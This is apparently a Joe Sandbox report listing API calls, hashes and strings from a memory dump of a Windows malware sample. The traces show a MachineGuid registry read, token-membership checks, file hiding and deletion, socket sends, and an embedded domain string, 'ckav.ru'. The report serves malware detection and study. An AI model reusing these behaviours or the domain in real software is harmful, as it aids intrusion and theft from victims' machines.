Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

